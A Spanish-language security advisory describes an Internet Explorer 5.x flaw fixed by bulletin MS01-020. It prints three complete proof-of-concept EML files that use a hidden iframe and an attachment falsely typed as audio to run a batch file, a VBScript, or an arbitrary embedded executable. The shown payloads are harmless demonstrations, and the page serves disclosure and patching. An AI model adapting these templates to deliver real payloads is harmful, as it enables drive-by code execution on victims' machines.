Vulnerabilidad de archivos EML en Internet Explorer Los archivos EML son archivos en formato MIME
"multipart" que IE va a interpretar de una curiosa manera. Existe una
vulnerabilidad que permite la ejecución arbitraria de código utilizando estos
archivos.
El problema afecta a IE 5.x en todas la plataformas Windows.
La solución está en aplicar el parche publicado por Microsoft en su
boletín MS01-020
Nótese que dicho parche no es aplicable a IE
5.0 versión no soportada por Microsoft.
El Instituto para la Seguridad en Internet,
descubridor de la vulnerabilidad ha preparado tres demostraciones :
Ejecucíon de
comandos
Ejecución de Visual Basic
Script
Ejecución de un progama EXE arbitrario
Para ver el contenido de los archivos EML hacer
click con el botón derecho sobre los enlaces anteriores y seleccionar la
opción Salvar Destino Como .
A continuación de adjunta el contenido de los
archivos EML, en rojo se ha incluido la parte activa del "exploit"
("payload")
Ejecución de comandos (cmd.eml) :
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will execute some console commands<BR>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>
echo OFF
dir C:\
echo YOUR SYSTEM HAS A VULNERABILITY
pause
--1
Ejecución de Visual Basic Script (vbs.eml) :
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will create the file C:\deleteme.txt<BR>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>
set objFileSystem =3D CreateObject("Scripting.FileSystemObject")
set objOutputFile =3D objFileSystem.CreateTextFile("C:\deleteme.txt", 1)
objOutputFile.writeline("You can delete this file.")
objOutputFile.close
msgbox "I have created the file : c:\deleteme.txt"
--1
Ejecución de un programa arbitrario (exe.eml) :
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will execute a program<BR>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
.................................................
YOU MUST PASTE HERE YOU .EXE FILE BASE64 ENCODED
--1
Este aviso ha sido leído en 16737 ocasiones y enviado por correo electrónico 7 veces. Ha sido valorado en 8 ocasiones, con una puntuación global de 4,6 puntos. Se han enviado 0 comentarios.
|
Valore la gravedad de esta vulnerabilidad: